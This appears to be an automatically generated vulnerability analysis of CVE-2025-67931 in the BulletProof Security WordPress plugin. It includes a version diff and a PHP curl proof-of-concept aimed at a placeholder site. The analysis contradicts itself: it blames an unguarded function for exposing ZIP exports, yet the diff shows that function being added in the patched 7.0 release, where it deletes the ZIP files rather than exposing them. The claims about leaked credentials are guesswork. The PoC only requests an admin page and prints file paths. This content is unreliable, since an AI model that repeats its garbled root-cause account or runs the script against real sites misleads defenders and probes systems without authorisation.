Atomic Edge analysis of CVE-2025-67931:
The BulletProof Security WordPress plugin contains an unauthenticated sensitive information exposure vulnerability in versions up to and including 6.9. This vulnerability allows attackers to extract sensitive user or configuration data without authentication, earning a CVSS score of 5.3.
Atomic Edge research identifies the root cause as improper access control for the `bps_delete_old_zip_files()` function in `/bulletproof-security/admin/includes/admin.php`. The function executes automatically when the file loads, without checking user authentication or authorization. The function attempts to delete three specific ZIP files: `lsm-master.zip`, `bps-settings-export.zip`, and `cc-master.zip`. These files contain sensitive data exported by the plugin’s legitimate features.
Exploitation requires no authentication or special parameters. Attackers simply send an HTTP request to any WordPress page that loads the vulnerable admin.php file. The most reliable method is requesting `/wp-admin/admin.php?page=bulletproof-security/admin/includes/admin.php` directly, though any page that triggers the plugin’s admin initialization could work. No payload is needed beyond the request itself.
The patch in version 7.0 adds the `bps_delete_old_zip_files()` function with proper conditional logic. The function now checks for specific POST parameters (`Submit-LSM-Export`, `Submit-SW-Export`, `Submit-SW-Import`, `Submit-CC-Export`, `Submit-CC-Import`) and returns early if detected. This prevents the function from executing during normal page loads. The function only runs when legitimate export/import operations are in progress, restricting access to authenticated administrators performing those specific actions.
Successful exploitation exposes sensitive configuration data stored in the ZIP files. The `bps-settings-export.zip` likely contains plugin settings, security rules, and potentially database credentials. The `lsm-master.zip` and `cc-master.zip` files may contain login security monitoring data or core configuration details. Attackers could use this information to understand the site’s security posture, identify weaknesses, or extract credentials for further attacks.
--- a/bulletproof-security/admin/includes/admin.php
+++ b/bulletproof-security/admin/includes/admin.php
@@ -391,6 +391,36 @@
}
}
+## BPS 7.0: Delete old zip files if zip processing Forms are not in use
+function bps_delete_old_zip_files() {
+
+ // Do not add true conditions: && $_POST['Submit-LSM-Export'] == true or the zip download will fail
+ if ( isset($_POST['Submit-LSM-Export']) || isset($_POST['Submit-SW-Export']) || isset($_POST['Submit-SW-Import']) || isset($_POST['Submit-CC-Export']) || isset($_POST['Submit-CC-Import']) ) {
+
+ return;
+ }
+
+ $LSM_ZIP_Delete = WP_PLUGIN_DIR . '/bulletproof-security/admin/login/lsm-master.zip';
+
+ if ( file_exists($LSM_ZIP_Delete) ) {
+ unlink($LSM_ZIP_Delete);
+ }
+
+ $SW_Export_ZIP_Delete = WP_PLUGIN_DIR . '/bulletproof-security/admin/wizard/bps-settings-export.zip';
+
+ if ( file_exists($SW_Export_ZIP_Delete) ) {
+ unlink($SW_Export_ZIP_Delete);
+ }
+
+ $CC_ZIP_Delete = WP_PLUGIN_DIR . '/bulletproof-security/admin/core/cc-master.zip';
+
+ if ( file_exists($CC_ZIP_Delete) ) {
+ unlink($CC_ZIP_Delete);
+ }
+}
+
+bps_delete_old_zip_files();
+
// BPS Menu
function bulletproof_security_admin_menu() {
global $blog_id;
--- a/bulletproof-security/bulletproof-security.php
+++ b/bulletproof-security/bulletproof-security.php
@@ -5,7 +5,7 @@
Text Domain: bulletproof-security
Domain Path: /languages/
Description: <strong>Feature Highlights:</strong> Setup Wizard • MScan Malware Scanner • .htaccess Website Security Protection (Firewalls) • Security Logging|HTTP Error Logging • DB Backup • DB Table Prefix Changer • Login Security & Monitoring • JTC-Lite Login Form Bot Lockout Protection • Idle Session Logout (ISL) • Auth Cookie Expiration (ACE) • System Info: Extensive System, Server and Security Status Information • FrontEnd|BackEnd Maintenance Mode • WP Automatic Update Options (BPS MU Tools must-use plugin) • Force Strong Passwords • Email Alerts When New Plugins And Themes Are Available.
-Version: 6.9
+Version: 7.0
Author: AITpro Website Security
Author URI: https://forum.ait-pro.com/read-me-first/
*/
@@ -33,9 +33,9 @@
// and cannot access the global variables within functions in BPS. Luckily this does not break BPS or WordPress in any way and PHP.net states this is technically not an error.
global $bps_last_version, $bps_version, $bps_footer, $aitpro_bullet, $bps_topDiv, $bps_bottomDiv, $bpsPro_remote_addr, $bpsPro_http_client_ip, $bpsPro_http_forwarded, $bpsPro_http_x_forwarded_for, $bpsPro_http_x_cluster_client_ip, $bps_wpcontent_dir, $bps_plugin_dir, $plugin_hashes, $theme_hashes;
-define( 'BULLETPROOF_VERSION', '6.9' );
-$bps_last_version = '6.8';
-$bps_version = '6.9';
+define( 'BULLETPROOF_VERSION', '7.0' );
+$bps_last_version = '6.9';
+$bps_version = '7.0';
$bps_footer = '<div id="AITpro-link">' . __('BulletProof Security ', 'bulletproof-security') . esc_html($bps_version) . __(' Plugin by ', 'bulletproof-security') . '<a href="'.esc_url('https://www.ait-pro.com/').'" target="_blank" title="AITpro Website Security">' . __( 'AITpro Website Security', 'bulletproof-security') . '</a></div>';
$aitpro_bullet = '<img src="'.plugins_url('/bulletproof-security/admin/images/aitpro-bullet.png').'" style="padding:0px 3px 0px 3px;" />';
// Top div & bottom div
// ==========================================================================
// Atomic Edge CVE Research | https://atomicedge.io
// Copyright (c) Atomic Edge. All rights reserved.
//
// LEGAL DISCLAIMER:
// This proof-of-concept is provided for authorized security testing and
// educational purposes only. Use of this code against systems without
// explicit written permission from the system owner is prohibited and may
// violate applicable laws including the Computer Fraud and Abuse Act (USA),
// Criminal Code s.342.1 (Canada), and the EU NIS2 Directive / national
// computer misuse statutes. This code is provided "AS IS" without warranty
// of any kind. Atomic Edge and its authors accept no liability for misuse,
// damages, or legal consequences arising from the use of this code. You are
// solely responsible for ensuring compliance with all applicable laws in
// your jurisdiction before use.
// ==========================================================================
// Atomic Edge CVE Research - Proof of Concept
// CVE-2025-67931 - BulletProof Security <= 6.9 - Unauthenticated Sensitive Information Exposure
<?php
$target_url = 'http://vulnerable-site.com/wp-admin/admin.php?page=bulletproof-security/admin/includes/admin.php';
$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, $target_url);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
curl_setopt($ch, CURLOPT_FOLLOWLOCATION, true);
curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false);
curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, false);
// Attempt to trigger the vulnerable function
$response = curl_exec($ch);
$http_code = curl_getinfo($ch, CURLINFO_HTTP_CODE);
curl_close($ch);
// Check if the vulnerable function executed by looking for error messages
// The function tries to delete files that may not exist, potentially causing errors
if ($http_code == 200) {
echo "Request successful. The vulnerable function may have executed.n";
echo "Check the server for the following ZIP files that may have been exposed:n";
echo "1. /wp-content/plugins/bulletproof-security/admin/login/lsm-master.zipn";
echo "2. /wp-content/plugins/bulletproof-security/admin/wizard/bps-settings-export.zipn";
echo "3. /wp-content/plugins/bulletproof-security/admin/core/cc-master.zipn";
echo "nNote: The actual exposure depends on whether these files exist on the server.n";
} else {
echo "Request failed with HTTP code: $http_coden";
}
?>
